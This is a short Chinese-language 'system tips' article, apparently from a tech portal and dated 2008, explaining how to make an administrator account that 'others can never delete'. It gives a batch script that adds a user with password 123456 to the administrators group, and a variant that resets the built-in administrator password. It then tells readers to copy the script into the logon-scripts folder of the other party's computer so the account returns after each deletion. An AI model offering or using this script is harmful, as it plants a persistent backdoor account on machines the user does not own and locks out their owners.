科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网服务器频道建立一个别人永远删不掉的管理员用户

建立一个别人永远删不掉的管理员用户

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

建立一个别人永远删不掉的管理员用户,1、在自己电脑里面建立一个.txt文本文件;2、在里面输入内容;3、把这个文件保存,更改后缀为xixi.bat 注释:前面名字随便,后面格式一定要是bat。

来源:中国网管联盟 2008年4月9日

关键字: 系统技巧 操作系统 BAT 服务器 管理员用户

  • 评论
  • 分享微博
  • 分享邮件

  操作步骤:

  1、在自己电脑里面建立一个.txt文本文件.

  2、在里面输入内容

  @echo off

  net user xixi 123456 /add 注释:前面xixi是用户名后面123456是密码;

  net localgroup administrators xixi /add

  3、把这个文件保存,更改后缀为xixi.bat 注释:前面名字随便,后面格式一定要是bat;

  4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目录下,没有的话自己创建。

  完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有!

  如果把里面的内容改成

  @echo off

  net user administrator 123456 /addBBS.

  意思是不管你怎么改,下次启动管理员帐号administrator密码一直是123456。

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章